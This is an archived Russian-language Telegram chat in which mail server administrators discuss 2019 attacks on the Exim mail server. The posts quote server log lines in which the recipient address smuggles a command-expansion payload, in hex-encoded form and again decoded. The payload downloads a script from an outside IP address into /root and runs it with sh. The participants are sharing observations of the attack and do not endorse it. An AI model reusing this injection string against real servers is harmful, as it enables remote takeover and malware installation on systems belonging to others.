Телеграмм чат группы ru

Size: a a a

Independent mail community

2019 June 11

2019-06-11 13:15:22.663 [4023] 1hab06-00012r-IK ** bin+${run{x2fbinx2fbashx20x2dcx20x22wgetx20x2dx2dnox2dcheckx2dcertificatex20x2dtx203x20x2dtx2075x20httpx3ax2fx2f185x2e162x2e235x2e211x2fldmximx20x2dox20x2frootx2fx2eyimrvx20x26x26x20shx20x2frootx2fx2eyimrvx20x2dnx22x20x26}}@dyn.su <bin+${run{\x2fbin\x2fbash\x20\x2dc\x20\x22wget\x20\x2d\x2dno\x2dcheck\x2dcertificate\x20\x2dt\x203\x20\x2dT\x2075\x20http\x3a\x2f\x2f185\x2e162\x2e235\x2e211\x2fldmxim\x20\x2dO\x20\x2froot\x2f\x2eyimrv\x20\x26\x26\x20sh\x20\x2froot\x2f\x2eyimrv\x20\x2dn\x22\x20\x26}}@***.su> F=<>: Unrouteable address

источник

10:16пожаловаться #1

Denis in Independent mail community

Raven

2019-06-11 13:15:22.663 [4023] 1hab06-00012r-IK ** bin+${run{x2fbinx2fbashx20x2dcx20x22wgetx20x2dx2dnox2dcheckx2dcertificatex20x2dtx203x20x2dtx2075x20httpx3ax2fx2f185x2e162x2e235x2e211x2fldmximx20x2dox20x2frootx2fx2eyimrvx20x26x26x20shx20x2frootx2fx2eyimrvx20x2dnx22x20x26}}@dyn.su <bin+${run{\x2fbin\x2fbash\x20\x2dc\x20\x22wget\x20\x2d\x2dno\x2dcheck\x2dcertificate\x20\x2dt\x203\x20\x2dT\x2075\x20http\x3a\x2f\x2f185\x2e162\x2e235\x2e211\x2fldmxim\x20\x2dO\x20\x2froot\x2f\x2eyimrv\x20\x26\x26\x20sh\x20\x2froot\x2f\x2eyimrv\x20\x2dn\x22\x20\x26}}@***.su> F=<>: Unrouteable address

это просто заголовок RCPT TO

RCPT TO "username+${run{/bin/bash -c "wget --no-check-certificate -t 3 -T 75 http://185.162.235.211/ldmxim -O /root/.yimrv && sh /root/.yimrv -n" &}}@dyn.su"

источник

10:48пожаловаться #2

Denis in Independent mail community

+_-

Саппорт уже вырубил сервак зараженный:(
У меня тоже есть проверька на нехорошие символы, она с коробки, надо там глянкть, думаю, что тоже была.

Кстати насчет поиска по айпи, хакеры ломанули и те машины. Там был Jenkins с RCE и майнером. Использовали как дроплоадеры.

источник

10:51пожаловаться #3

Vsevolod Stakhov in Independent mail community

Raven

Мне вот все-таки категорически интересно, почему в случае с конкретно этой уязвимостью все бросились проклинать exim, а не свои кривые конфиги или нежелание следить за софтом?
Лог с сервака клиента, 4.91, настраивался чёрти когда:

2019-06-10 05:21:13 H=(server.***.ru) [89.248
.171.57] F=<> rejected RCPT <${run{\x2fbin\x2fbash\x20\x2dc\x20\x22wget\x20\x2d\x2dno\x2dcheck\x2dcertificate\x20\x2dt\x203\x20\x2dT\x2075\x20http\x3a\x2f\x2f185\x2e162\x2e235\x2e211\x2fldmxim\x20\x2dO\x20\x2froot\x2f\x2eyimrv\x20\x26\x26\x20sh\x20\x2froot\x2f\x2eyimrv\x20\x2dn\x22\x20\x26}}@server.***.ru>: relay not permitted
2019-06-10 05:21:13 H=(server.***.ru) [89.248.171.57] F=<> rejected RCPT <root+${run{\x2fbin\x2fbash\x20\x2dc\x20\x22wget\x20\x2d\x2dno\x2dcheck\x2dcertificate\x20\x2dt\x203\x20\x2dT\x2075\x20http\x3a\x2f\x2f185\x2e162\x2e235\x2e211\x2fldmxim\x20\x2dO\x20\x2froot\x2f\x2eyimrv\x20\x26\x26\x20sh\x20\x2froot\x2f\x2eyimrv\x20\x2dn\x22\x20\x26}}@server.***.ru>: relay not permitted
2019-06-10 05:21:13 H=(server.***.ru) [89.248.171.57] F=<> rejected RCPT <bin+${run{\x2fbin\x2fbash\x20\x2dc\x20\x22wget\x20\x2d\x2dno\x2dcheck\x2dcertificate\x20\x2dt\x203\x20\x2dT\x2075\x20http\x3a\x2f\x2f185\x2e162\x2e235\x2e211\x2fldmxim\x20\x2dO\x20\x2froot\x2f\x2eyimrv\x20\x26\x26\x20sh\x20\x2froot\x2f\x2eyimrv\x20\x2dn\x22\x20\x26}}@server.***.ru>: relay not permitted

потому что категорически виноваты криворукие разработчики Exim’а

источник

10:52пожаловаться #4

Vsevolod Stakhov in Independent mail community

а уж попытки это исправить конфигурацией - это как лечить спидорак подорожником

источник

10:52пожаловаться #5

Denis in Independent mail community

Vsevolod Stakhov

потому что категорически виноваты криворукие разработчики Exim’а

А там еще есть живые разрабы? Полтора землекома небось без review.

источник